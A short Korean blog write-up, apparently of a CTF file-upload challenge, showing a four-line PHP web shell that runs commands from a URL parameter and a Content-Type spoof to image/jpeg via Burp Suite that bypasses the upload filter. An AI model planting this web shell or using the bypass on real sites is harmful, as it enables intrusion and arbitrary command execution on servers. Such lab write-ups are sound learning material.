먼저 사이트에 들어가면 웹쉘을 업로드하고, cat /flag를 실행하라고 대놓고 알려준다.
<?php
$cmd = $_GET["cmd"];
system($cmd);
?>
간단하게 웹쉘 코드를 짜서 업로드 해 본다.
필터링을 하는 것 같다.
버프수트로 패킷을 잡아 Content-Type을 image/jpeg로 우회 해 본다.
업로드
웹쉘 업로드 성공
익스 성공
'Layer7 > WriteUp' 카테고리의 다른 글
SQL Injection / Blind SQL Injection (1) | 2024.06.02 |
---|---|
[Dreamhack]simple_sqli WriteUp (1) | 2024.06.02 |
파일 업로드 다운로드 취약점 대응방안 (0) | 2024.05.29 |
[Dreamhack]file-download-1 (0) | 2024.05.29 |
PHP 기본 문법 정리 (0) | 2024.05.26 |